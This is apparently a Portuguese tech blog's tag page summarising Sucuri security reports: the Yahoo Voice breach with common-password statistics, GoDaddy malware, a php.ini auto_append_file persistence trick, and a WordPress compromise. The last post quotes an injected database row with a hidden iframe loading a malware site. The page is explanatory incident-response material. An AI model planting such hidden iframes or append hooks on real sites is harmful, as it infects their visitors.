Todos os posts tagados sucuri

Yahoo Voice comprometido. Veja se a sua conta está em risco.

Yahoo Voice comprometido. Veja se a sua conta está em risco.

Com o ataque ao Yahoo Voice, mais de 400.000 dados de utilizador foram publicados na web.

Segundo a última informação, o método para obter esta informação foi via SQL Injection e que as palavras passe estavam… guess what? Plaintext.
Incrível que nos tempos que correm, e na empresa em questão, ainda armazenam dados confidenciais sem encriptação.

A Sucuri publicou um resumo do ficheiro com os dados de acesso de 453.411 disponivel na web onde são visiveis 342.481 passwords únicas.
Como o Yahoo Voice permite registo com outras contas de email, no top dos dominios dos emails comprometidos estão:

135.599 yahoo.com
106.185 gmail.com
543.93 hotmail.com
24.677 aol.com
8.422 comcast.net
6.282 msn.com

Quanto ao Top10 das passwords mais utilizadas no ficheiro temos:

[número de ocorrências] [password]
1666 123456
780 password
437 welcome
333 ninja
250 abc123
222 123456789
208 12345678
205 sunshine
202 princess
172 qwerty

Como em ataques anterioes, as passwords dominantes continuam a ser faceis de efectuar ataques brute-force e são demasiados fracas em segurança.

A Sucuri também disponibilizou um serviço online para consultar se um email foi comprometido. Pode ser consultado aqui.

Código malware utilizado no GoDaddy

Sucuri publica código que foi ou está a ser utilizado para propagar malware no GoDaddy.

… parece que a bola está do lado do GoDaddy depois de estes terem chutado para canto.

UPDATE:

O comunicado oficial sobre este tema já foi publicado pelo GoDaddy.

Em caso de malware em website…

… verificar todos os directórios para além do htdocs.

Por diversas vezes já fui consultado para remoção de malware em websites e sinceramente nunca me apareceu nada semelhante ao que foi divulgado no blogue Sucuri Security.

Após várias tentativas falhadas de remoção de malware num website de um utilizador, o Sucuri Security conseguiu encontrar o código malicioso num ficheiro PERL armazenado no directório cgi-bin.

É um local não muito comum e com uma taxa de detecção reduzida (pelo menos para o utilizador comum) porque o código é colocado num directório fora do htdocs, num ficheiro php.ini que por sua vez recorre ao parâmetro auto_append_file.

auto_append_file = “/home/user/USER/cgi-bin/security.cgi”

Este parâmetro é utilizado para adicionar código no final de todos os ficheiros script PHP.

Neste caso prático, é chamado um código armazenado no ficheiro security.cgi com conteúdo malicioso como pode verificar na imagem abaixo.

Definitivamente uma boa nota/dica de análise para adicionar a uma checklist quando for necessário fazer alguma remoção de malware num website infectado.

* Imagem retirada do blogue da Sucuri

Blogues WordPress comprometidos no Network Solutions

Ontem foram publicados alguns alertas (Sucuri, NetworkSolutions, TechCocktail) de que o WordPress, mais propriamente a última versão 2.9.2, estaria vulnerável.

A razão deste alerta foram as centenas de blogues comprometidos e infectados com malware, principalmente em alojamentos do NetworkSolutions.

Hoje, o Sucuri em colaboração com o a equipa do NetworkSolutions, chegaram à conclusão que os incidentes ocorreram com a falta de permissões adequadas no ficheiro de configuração do WordPress (wp-config.php) e que um utilizador malicioso conseguiu aceder, num dos servidores do NetworkSolutions, aos dados de acesso da base de dados de cada cliente vulnerável e inseriu um iframe para um website com malware.

(2, 0, ‘siteurl’, ‘<iframe style=\”display:none\” height=\”0\” width=\” 1\” src=\”http://networkads.net/grep/\”></iframe>’, ‘yes’),

Na minha opinião a equipa do WordPress devia rever as regras de segurança numa instalação default.

Actualização (11-04-2010):

Também já foi identificado o mesmo ataque usando o endereço do iframe:

http://mainnetsoll.com/grep/